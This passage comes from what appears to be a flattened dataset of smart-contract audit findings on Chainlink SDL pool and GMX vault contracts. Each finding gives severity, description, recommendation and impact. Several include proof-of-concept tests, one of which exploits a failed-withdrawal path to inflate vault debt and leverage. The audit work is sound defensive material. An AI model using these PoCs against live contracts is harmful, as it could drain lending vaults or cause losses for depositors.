This entire process helps to keep the information updated between the primary chain and the secondary chain.\\nOn the other hand, when a secondary chain receive rewards, the secondary chain can call the function SDLPoolCCIPControllerSecondary::performUpkeep since `shouldUpdate` is `true` at code line 157:\\n```\\nFile: SDLPoolCCIPControllerSecondary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n if (_message.data.length == 0) {\\n uint256 numRewardTokens = _message.destTokenAmounts.length;\\n address[] memory rewardTokens = new address[](numRewardTokens);\\n if (numRewardTokens != 0) {\\n for (uint256 i = 0; i < numRewardTokens; ++i) {\\n rewardTokens[i] = _message.destTokenAmounts[i].token;\\n IERC20(rewardTokens[i]).safeTransfer(sdlPool, _message.destTokenAmounts[i].amount);\\n }\\n ISDLPoolSecondary(sdlPool).distributeTokens(rewardTokens);\\n if (ISDLPoolSecondary(sdlPool).shouldUpdate()) shouldUpdate = true;\\n }\\n } else {\\n uint256 mintStartIndex = abi.decode(_message.data, (uint256));\\n ISDLPoolSecondary(sdlPool).handleIncomingUpdate(mintStartIndex);\\n }\\n\\n emit MessageReceived(_message.messageId, _message.sourceChainSelector);\\n }\\n```\\n\\nOnce `shouldUpdate` is `true`, the function SDLPoolCCIPControllerSecondary::performUpkeep can be called in order to send the new information (numNewRESDLTokens and totalRESDLSupplyChange) to the primary chain:\\n```\\n function performUpkeep(bytes calldata) external {\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n\\nThe problem is that the `primary chain` needs to send rewards to the `secondary chain` so that `shouldUpdate` is true and the function SDLPoolCCIPControllerSecondary::performUpkeep can be called. 
However, in certain circumstances it is possible that the `secondary chain` may never be able to send information to the `primary chain` since there may not be any rewards for the `secondary chain`. Please consider the next scenario:\\n`UserA` stakes directly in the `secondary chain` and the queuedRESDLSupplyChange increments\\nThe increase in supply CANNOT be reported to the `primary chain` since `shouldUpdate = false` and the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nRewards are calculated on the `primary chain`, however because the `secondary chain` has not been able to send the new supply information, zero rewards reSDLSupplyByChain will be calculated for the `secondary chain` since `reSDLSupplyByChain[chainSelector]` has not been increased with the new information from `step 1`.\\nSince there are NO rewards assigned for the `secondary chain`, it is not possible to set `shouldUpdate=True`, therefore the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nThe following test shows that a user can send `sdl` tokens to the `secondary pool` however SDLPoolCCIPControllerSecondary::performUpkeep cannot be called since there are no rewards assigned to the secondary pool:\\n```\\n// File: test/core/ccip/sdl-pool-ccip-controller-secondary.test.ts\\n// $ yarn test --grep \"codehawks performUpkeep reverts\"\\n// \\n it('codehawks performUpkeep reverts', async () => {\\n await token1.transfer(tokenPool.address, toEther(1000))\\n let rewardsPool1 = await deploy('RewardsPool', [sdlPool.address, token1.address])\\n await sdlPool.addToken(token1.address, rewardsPool1.address)\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 400)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n //\\n // 1. 
Mint in the secondary pool\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n //\\n // 2. The secondary pool needs to update data to the primary chain but the `controller.shouldUpdate` is false so `performUpkeep` reverts the transaction\\n assert.equal(await sdlPool.shouldUpdate(), true)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n await expect(controller.performUpkeep('0x')).to.be.revertedWith('UpdateConditionsNotMet()')\\n })\\n```\\nчUpdates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the `secondary pool`\\nThe SDLPoolCCIPControllerSecondary::performUpkeep function may check if the `secondary pool` has new information and so do not wait for rewards to be available for the secondary pool:\\n```\\n function performUpkeep(bytes calldata) external {\\n// Remove the line below\\n// Remove the line below\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n// Add the line below\\n// Add the line below\\n if (!shouldUpdate && !ISDLPoolSecondary(sdlPool).shouldUpdate()) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\nч`numNewRESDLTokens` and `totalRESDLSupplyChange` updates from the `secondary pool` to the `primary pool` may not be executed, causing the rewards calculation to be incorrect for each chain.\\nTools used\\nManual reviewч```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += 
uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n -depositors face immediate loss in case `equity = 0`чmediumчThe vulnerability in the `valueToShares` function exposes users to significant losses in case the equity `(currentAllAssetValue - debtBorrowed)` becomes zero due to strategy losses, users receive disproportionately low shares, and take a loss Immediately.\\nWhen a user deposits to the contract, the calculation of the shares to be minted depends on the `value` of `equity` added to the contract after a successful deposit. In other words:\\n`value` = `equityAfter` - `equityBefore`, while:\\n`equity` = `totalAssetValue` - `totalDebtValue`. and we can see that here :\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n\\nNOTICE: When the equity value is `0`, the shares minted to the user equal the deposited value itself. 
The equity value can become zero due to various factors such as strategy losses or accumulated lending interests... ect\\nIn this scenario, the user immediately incurs a loss, depending on the total supply of `svToken` (shares).\\nConsider the following simplified example:\\nThe total supply of `svToken` is (1,000,000 * 1e18) (indicating users holding these shares).\\nthe equity value drops to zero due to strategy losses and a user deposits 100 USD worth of value,\\nDue to the zero equity value, the user is minted 100 shares (100 * 1e18).\\nConsequently, the value the user owns with these shares immediately reduces to 0.001 USD. `100 * 100 * 1e18 / 1,000,000 = 0.001 USD` (value * equity / totalSupply).\\nIn this case, the user immediately shares their entire deposited value with these old minted shares and loses their deposit, whereas those old shares should be liquidated some how.\\nNotice: If the total supply is higher, the user loses more value, and vice versa.чuse a liquidation mechanism that burns the shares of all users when equity drops to zero.чusers face immediate loss of funds in case equity drops to zeroч```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n -incorrect handling of compound cancelation 
lead vault to stuck at `compound_failed` statusчmediumчthe compound function allows the keeper to swap a token for TokenA or TokenB and add it as liquidity to `GMX`. However, if the deposit get cancelled, the contract enters a `compound_failed` status. leading to a deadlock and preventing further protocol interactions.\\n-The `compound` function is invoked by the keeper to swap a token held by the contract (e.g., from an airdrop as sponsor said) for TokenA or TokenB. Initially, it exchanges this token for either tokenA or tokenB and sets the status to `compound`. Then, it adds the swapped token as liquidity to `GMX` by creating a deposit:\\n```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this 
return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n\\nIn the event of a successful deposit, the contract will set the status to `open` again. However, if the deposit is cancelled, the callback will call `processCompoundCancellation()` function and the status will be set to `compound_failed` as shown in the following code:\\n```\\n function processCompoundCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessCompoundCancellationChecks(self);\\n self.status = GMXTypes.Status.Compound_Failed;\\n\\n emit CompoundCancelled();\\n }\\n```\\n\\nThe issue arises when the deposit is cancelled, and the status becomes `compound_failed`. In this scenario, only the compound function can be called again and only by the keeper, but the tokens have already been swapped for TokenA or TokenB (Because we successfully create a deposit in `GMX` that means the swap was successfull). Consequently, the `amountIn` will be zero, and in this case the compound logic will be skipped.\\n```\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n //compound logic\\n //// rest of code.\\n }\\n```\\n\\nAs a result, the status will remain `compound_failed`, leading to a deadlock. 
If keeper continue to call this function, no progress will be made, only gas will be wasted. Furthermore, all interactions with the protocol are impossible since the status is `compound_failed`.чincorrect handling of compound cancelation lead vault to stuck at `compound_failed` status\\nin the event of a deposit get cancelled when trying to compound. just add liquidity again without the swapping logic.чstrategy vault stuck at `compond_failed` status. prevent any interaction with the protocol\\nkeeper may waste a lot of gas trying to handle this situation .ч```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? 
zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n -The protocol will mint unnecessary fees if the vault is paused and reopened later.чmediumчUnnecessary fees will be minted to the treasury if the vault is paused and reopened later.\\nBased on the test results, the protocol mints 5(this can be more) wei(gvToken) for each `gvToken` every second since the last fee collection. For example, if the `totalSupply` of `gvToken` is 1000000e18 and the time difference between the current block and the last fee collection is 10 seconds, the amount of lp tokens minted as a fee will be 50000000 wei in terms of `gvToken`. 
This is acceptable when the protocol is functioning properly.\\n```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n\\nHowever, if the protocol needs to be paused due to a hack or other issues, and then the vault is reopened, let's say after 1 month of being paused, the time difference `block.timestamp - lastFeeCollected` (i.e. `_secondsFromLastCollection`) will be = 2630000s\\nIf the first user tries to deposit after the vault reopens, the fees charged will be 1000000e18 * 5 * 2630000 / 1e18 = 13150000000000\\nThis is an unnecessary fee generated for the treasury because the vault was paused for a long time, but the fee is still generated without taking that into account. This can result in the treasury consuming a portion of the user shares.чIf the vault is being reopened, there should be a function to override the _store.lastFeeCollected = block.timestamp; with block.timestamp again.чThis will lead to a loss of user shares for the duration when the vault was not active. The severity of the impact depends on the fee the protocol charges per second, the totalSupply of vault tokens, and the duration of the vault being paused.ч```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n -`emergencyPause` does not check the state before running && can cause loss of funds for usersчmediumчThe `emergencyPause` function in the GMX smart contract can be called by the keeper at any time without pre-transaction checks. 
In some cases this could result in financial loss for users if the function is executed before the callbacks have executed.\\nThe emergencyPause function lacks a control mechanism to prevent execution before callbacks execution. While it is designed to halt all contract activities in an emergency, its unrestricted execution could disrupt ongoing transactions. For example, if a user calls a function like deposit which involves multiple steps and expects a callback, and emergencyPause is invoked before the callback is executed, the user might lose his funds as he will not be able to mint svTokens.\\nSince `emergencyPause` updates the state of the Vault to `GMXTypes.Status.Paused`, when the callback from GMX executes the `afterDepositExecution` nothing will happen since the conditions are not met. Which means that any deposit amount will not be met by a mint of svTokens.\\n```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the 
conditions are not met\\n }\\n```\\n\\nIf by any chance, the `processDeposit` function is executed (or any other function from the callback) it will still revert in the beforeChecks (like the beforeProcessDepositChecks).\\n```\\n function beforeProcessDepositChecks(\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Deposit)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\nчTo mitigate this risk, the following recommendations should be implemented:\\nIntroduce a state check mechanism that prevents emergencyPause from executing if there are pending critical operations that must be completed to ensure the integrity of in-progress transactions.\\nImplement a secure check that allows emergencyPause to queue behind critical operations, ensuring that any ongoing transaction can complete before the pause takes effect.чIf the emergency pause is triggered at an inopportune time, it could:\\nPrevent the completion of in-progress transactions.\\nLead to loss of funds if the transactions are not properly rolled back.\\nErode user trust in the system due to potential for funds to be stuck without recourse.\\nPOC :\\nYou can copy this test in the file GMXEmergencyTest.t.sol then execute the test with the command forge test --mt\\n```\\n function test_UserLosesFundsAfterEmergencyPause() external {\\n deal(address(WETH), user1, 20 ether);\\n uint256 wethBalanceBefore = IERC20(WETH).balanceOf(user1);\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 10e18, 1, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n vm.prank(owner);\\n vault.emergencyPause();\\n\\n vm.prank(user1);\\n mockExchangeRouter.executeDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n uint256 wethBalanceAfter = IERC20(WETH).balanceOf(user1);\\n //Check that no tokens have been minted to user while user loses funds = 10 eth\\n assertEq(IERC20(vault).balanceOf(user1), 0);\\n assertEq(wethBalanceAfter, 
wethBalanceBefore - 10 ether);\\n\\n }\\n```\\nч```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n -try-catch does not store the state when it is revertedчhighчIf a withdrawal from GMX is successful without any errors, the borrowed amount is repayed to the lending vaults within a try-catch block within the processWithdraw function. Subsequently, the afterWithdrawChecks are performed. If a revert occurs during this step, everything executed within the try-catch block is reseted, and the Vault's status is set to 'Withdraw_Failed.' In such a scenario, a Keeper must call the processWithdrawFailure function. 
In this case, there is an erroneous attempt to borrow from the LendingVaults again, even though the repayment never actually occurred due to the revert within the try-catch block.\\nHere is a POC that demonstrates how a user can exploit this bug by intentionally causing the afterWithdrawChecks to fail, resulting in additional borrowing from the LendingVault in the processWithdrawFailure function.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n 
//User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. 
(Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(\"DebtAmtBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"DebtAmtAfter: %s\", debtAmtTokenBAfter);\\n console.log(\"leverageBefore: %s\", leverageBefore);\\n console.log(\"leverageAfter: %s\", leverageAfter);\\n }\\n}\\n```\\n\\nThe PoC can be started with this command: `forge test --match-test test_POC1 -vv`чIn processWithdrawFailure, no more borrowing should occur:\\n```\\nFile: contracts/strategy/gmx/GMXWithdraw.sol#processWithdrawFailure\\nGMXManager.borrow(\\n self,\\n self.withdrawCache.repayParams.repayTokenAAmt,\\n self.withdrawCache.repayParams.repayTokenBAmt\\n);\\n```\\n\\nThese lines of code should be deletedчUsers can intentionally deplete the capacity of a lending vault to increase the leverage of a vault. This also results in lending vaults having no capacity left for new deposits. As a result, the utilization rate increases significantly, leading to higher borrowing costs.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n 
mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. 
(Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(\"DebtAmtBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"DebtAmtAfter: %s\", debtAmtTokenBAfter);\\n console.log(\"leverageBefore: %s\", leverageBefore);\\n console.log(\"leverageAfter: %s\", leverageAfter);\\n }\\n}\\n```\\n -Setter functions for core GMX contractsчmediumчGMX docs state that their `ExchangeRouter` and `GMXOracle` contracts `will` change as new logic is added. Therefore setter functions should be added to `GMXVault.sol` to be able to update the state variables storing those addressed when the need arises.\\nFrom the GMX docs:\\n```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\nчCreate setter functions in `GMXVault.sol` as below:\\n```\\n function updateExchangeRouter(address exchangeRouter) external onlyOwner {\\n _store.exchangeRouter = exchangeRouter;\\n emit ExchangeRouterUpdated(exchangeRouter);\\n }\\n\\n function updateGMXOracle(address gmxOracle) external onlyOwner {\\n _store.gmxOracle = gmxOracle;\\n emit GMXOracleUpdated(gmxOracle);\\n }\\n```\\nчNot being able to use the `ExchangeRouter` and `GMXOracle` contracts the protocol would effectively be unusable given their importance.ч```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n -`GMXVault` can be blocked by a malicious actorчhighч`GMXVault` can be blocked by malicious actor if he made a `depositNative` call with unpayable contract and the deposit then cancelled by the GMX exchange router (3rd party).\\nUsers can deposit native tokens in vaults that either of its token pair is a WNT (wrapped native token) by calling `GMXVault.depositNative` payable function with the required deposit parameters (such as token, amount, minimum share amount, slippage & 
